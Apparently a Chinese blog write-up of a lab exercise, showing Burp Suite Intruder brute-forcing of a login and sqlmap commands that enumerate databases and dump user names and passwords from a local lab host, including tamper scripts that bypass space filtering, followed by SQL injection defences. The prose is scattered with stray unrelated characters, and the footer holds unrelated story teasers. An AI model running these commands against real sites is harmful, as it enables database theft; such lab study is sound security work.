2018-08-08 Web暴力破解及SQL注入

SQL注入漏洞概述:所謂SQL注入般渡,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令具钥。SQL注入攻擊是黑客對數(shù)據(jù)庫進(jìn)行攻擊的常用手段之一豆村。隨著B/S模式應(yīng)用開發(fā)的發(fā)展,使用這種模式編寫應(yīng)用程序的程序員也越來越多骂删。但是由于程序員的水平及經(jīng)驗(yàn)也參差不齊掌动,相當(dāng)大一部分程序員在編寫代碼的時(shí)候,沒有對用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷宁玫,使應(yīng)用程序存在安全隱患粗恢。用戶可以提交一段數(shù)據(jù)庫查詢代碼,根據(jù)程序返回的結(jié)果欧瘪,獲得某些他想得知的數(shù)據(jù)眷射,這就是所謂的SQL Injection,即SQL注入。

Burpsuite妖碉。Burp Suite 是用于攻擊web 應(yīng)用程序的集成平臺(tái)涌庭,包含了許多工具。Burp Suite為這些工具設(shè)計(jì)了許多接口欧宜,以加快攻擊應(yīng)用程序的過程坐榆。所有工具都共享一個(gè)請求,并能處理對應(yīng)的HTTP 消息冗茸、持久性席镀、認(rèn)證、代理蚀狰、日志愉昆、警報(bào)。

Sqlmap麻蹋。Sqlmap是一種開源的滲透測試工具跛溉,可以自動(dòng)檢測和利用SQL注入漏洞以及接入該數(shù)據(jù)庫的服務(wù)器。它擁有非常強(qiáng)大的檢測引擎扮授、具有多種特性的滲透測試器芳室、通過數(shù)據(jù)庫指紋提取訪問底層文件系統(tǒng)并通過外帶連接執(zhí)行命令。


web暴力破解實(shí)現(xiàn)過程:

1刹勃、首先對選定頁面進(jìn)行登錄堪侯,然后將burpsuite攔截到的數(shù)據(jù)發(fā)送到Intrder模塊

2、選擇爆破模式荔仁,burpsuite有四種模式伍宦。Sniper 單參數(shù)爆破,多參數(shù)時(shí)同一個(gè)字典按順序替換各參數(shù)乏梁,總之初始值有一個(gè)參數(shù)不變次洼;Battering ram 多參數(shù)同時(shí)爆破,但用的是同一個(gè)字典遇骑;Pichfork 多參數(shù)同時(shí)爆破卖毁,但用的是不同的字典;Cluster bamb 多參數(shù)做笛卡爾乘積模式爆破落萎。

3亥啦、選定爆破模式后,設(shè)定參數(shù)變量练链,選中要設(shè)置為爆破參數(shù)的變量翔脱,然后點(diǎn)擊add。?

選定參數(shù)

4媒鼓、然后點(diǎn)擊payloads碍侦,分別設(shè)置每個(gè)參數(shù)的攻擊載荷粱坤。

設(shè)置攻擊載荷

5、點(diǎn)擊start?attack瓷产,開始爆破站玄,爆破成功的數(shù)據(jù)包會(huì)比錯(cuò)誤的數(shù)據(jù)包的length要長。

爆破界面

Sql注入實(shí)現(xiàn)過程濒旦。

一:example1注入

example1沒有開啟任何防護(hù)株旷,使用sqlmap直接注入就行。

1尔邓、sqlmap -u "192.168.78.131/sqli/example1.php?name=root" --dbs 報(bào)數(shù)據(jù)庫

2晾剖、sqlmap -u "192.168.78.131/sqli/example1.php?name=root" -D exercises --tables 爆表

3、-u "192.168.78.131/sqli/example1.php?name=root" -D exercises -T users --columns 爆字段

4梯嗽、-u "192.168.78.131/sqli/example1.php?name=root" -D exercises -T users -C name,passwd --dump 爆出相應(yīng)字段的值齿尽。

二:example2注入

手工注入試了一下,錯(cuò)誤提示灯节,NO ERROR SPACE循头,應(yīng)該是對空格進(jìn)行了過濾,使用space2morehash.py腳本繞過網(wǎng)站的過濾炎疆,進(jìn)行注入卡骂。

1、sqlmap -u "192.168.78.131/sqli/example2.php?name=root" -v 3 --dbs --batch --tamper "space2morehash.py" 爆數(shù)據(jù)庫

2形入、sqlmap -u "192.168.78.131/sqli/example2.php?name=root" -v 3 -D exercises --tables --batch --tamper "space2morehash.py" 爆數(shù)據(jù)表

3全跨、sqlmap -u "192.168.78.131/sqli/example2.php?name=root" -v 3 -D exercises -T users --columns --batch --tamper "space2morehash.py" 爆字段名

4、sqlmap -u "192.168.78.131/sqli/example2.php?name=root" -v 3 -D exercises -T users -C name,passwd --dump --batch --tamper "space2morehash.py" 爆相應(yīng)字段的值

三:example3注入

Space2morehash的腳本不能繞過過濾亿遂,試了試確定過濾參數(shù)浓若,發(fā)現(xiàn)輸入+號時(shí),錯(cuò)誤提示也是NO ERROR SAPCE蛇数,想到應(yīng)該是把space2plus腳本的替換結(jié)果也當(dāng)做了空格過濾七嫌,就嘗試了其他替換空格的腳本,發(fā)現(xiàn)space2comment腳本可以繞過過濾苞慢,就采用這個(gè)腳本進(jìn)行注入。

1英妓、sqlmap -u "192.168.78.131/sqli/example3.php?name=root" --dbs --batch -v 3 --tamper "space2comment.py" 爆庫

2挽放、sqlmap -u "192.168.78.131/sqli/example3.php?name=root" -D exercises --tables --batch -v 3 --tamper "space2comment.py" 爆數(shù)據(jù)表

3、sqlmap -u "192.168.78.131/sqli/example3.php?name=root" -D exercises -T users --columns --batch -v 3 --tamper "space2comment.py" 爆字段名

4蔓纠、sqlmap -u "192.168.78.131/sqli/example3.php?name=root" -D exercises -T users -C name,passwd --dump --batch -v 3 --tamper "space2comment.py" 爆字段值辑畦。


SQL注入漏洞防護(hù)措施

1、開發(fā)過程中腿倚,注意安全細(xì)節(jié)纯出,如盡量使用PrepareStatement代替Statement,數(shù)據(jù)庫訪問權(quán)限不要使用SA用戶,不要將異常拋出在客戶端頁面暂筝,安裝網(wǎng)站的時(shí)候刪除bak文件避免文件資料泄露

2箩言、采用waf安全機(jī)制,過濾掉焕襟;空格一類的sql注入常用字符及相應(yīng)腳本的轉(zhuǎn)換結(jié)果

3陨收、對用戶信息在數(shù)據(jù)庫中進(jìn)行加密

4、網(wǎng)站管理員定期更換密碼鸵赖,隨時(shí)關(guān)注網(wǎng)站安全情況务漩,發(fā)現(xiàn)可疑情況,立即采取響應(yīng)措施

5它褪、限制表單數(shù)據(jù)輸入和查詢字符串輸入的長度

6饵骨、設(shè)置web目錄訪問權(quán)限

7、Web服務(wù)器以最小權(quán)限進(jìn)行配置茫打,只提供web服務(wù)

8居触、用戶權(quán)限分離,不同的用戶只能對授權(quán)給自己的數(shù)據(jù)庫執(zhí)行數(shù)據(jù)庫操作

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末包吝,一起剝皮案震驚了整個(gè)濱河市饼煞,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌诗越,老刑警劉巖砖瞧,帶你破解...
    沈念sama閱讀 221,695評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異嚷狞,居然都是意外死亡块促,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,569評論 3 399
  • 文/潘曉璐 我一進(jìn)店門床未,熙熙樓的掌柜王于貴愁眉苦臉地迎上來竭翠,“玉大人,你說我怎么就攤上這事薇搁≌牛” “怎么了?”我有些...
    開封第一講書人閱讀 168,130評論 0 360
  • 文/不壞的土叔 我叫張陵啃洋,是天一觀的道長传货。 經(jīng)常有香客問我,道長宏娄,這世上最難降的妖魔是什么问裕? 我笑而不...
    開封第一講書人閱讀 59,648評論 1 297
  • 正文 為了忘掉前任,我火速辦了婚禮孵坚,結(jié)果婚禮上粮宛,老公的妹妹穿的比我還像新娘窥淆。我一直安慰自己,他們只是感情好巍杈,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,655評論 6 397
  • 文/花漫 我一把揭開白布忧饭。 她就那樣靜靜地躺著,像睡著了一般秉氧。 火紅的嫁衣襯著肌膚如雪眷昆。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,268評論 1 309
  • 那天汁咏,我揣著相機(jī)與錄音亚斋,去河邊找鬼。 笑死攘滩,一個(gè)胖子當(dāng)著我的面吹牛帅刊,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播漂问,決...
    沈念sama閱讀 40,835評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼赖瞒,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了蚤假?” 一聲冷哼從身側(cè)響起栏饮,我...
    開封第一講書人閱讀 39,740評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎磷仰,沒想到半個(gè)月后袍嬉,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,286評論 1 318
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡灶平,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,375評論 3 340
  • 正文 我和宋清朗相戀三年伺通,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片逢享。...
    茶點(diǎn)故事閱讀 40,505評論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡罐监,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出瞒爬,到底是詐尸還是另有隱情弓柱,我是刑警寧澤,帶...
    沈念sama閱讀 36,185評論 5 350
  • 正文 年R本政府宣布侧但,位于F島的核電站矢空,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏俊犯。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,873評論 3 333
  • 文/蒙蒙 一伤哺、第九天 我趴在偏房一處隱蔽的房頂上張望燕侠。 院中可真熱鬧者祖,春花似錦、人聲如沸绢彤。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,357評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽茫舶。三九已至械巡,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間饶氏,已是汗流浹背讥耗。 一陣腳步聲響...
    開封第一講書人閱讀 33,466評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留疹启,地道東北人古程。 一個(gè)月前我還...
    沈念sama閱讀 48,921評論 3 376
  • 正文 我出身青樓,卻偏偏與公主長得像喊崖,于是被迫代替她去往敵國和親挣磨。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,515評論 2 359

推薦閱讀更多精彩內(nèi)容